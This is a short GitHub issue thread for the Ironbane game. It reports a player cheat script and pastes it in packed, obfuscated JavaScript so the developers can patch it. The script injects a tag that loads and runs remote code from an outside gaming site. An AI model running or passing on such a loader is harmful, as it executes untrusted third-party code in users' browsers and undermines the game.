### ISSUE TITLE
Players are able to cheat with Scottss wonderful script

### ISSUE THREAD

**Issue by eric-ycw** [ironbane/IronbaneServerLegacy#256]
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0 i=9(){0 3;n(j.o.m.q(\'5.6\')!=-1){3=\'c://d.6/5/8/p.l\'}k{3=\'c://d.6/5/8/v.x\'}0 g=9(f){0 7=2.h(\'e\');7.r=f+\'?t=\'+s.u();2.a.b(7)};g(3)};0 4=2.h("e");4.y="("+i.w()+")();";2.a.b(4);',35,35,'var||document|soe_url|_soe|ironbane|com|el|soe|function|body|appendChild|http|scottssgaming|script|url|loadScript|createElement|_soe_main|window|else|js|host|if|location|ScriptOfEpic|indexOf|src|Date||now|tracker|toString|php|textContent'.split('|'),0,{}))

**Comment by eric-ycw** [comment]
May help the devs to patch it.

**Comment by ghost** [comment]
Closing for now, see https://github.com/ironbane/IronbaneServer/issues/256
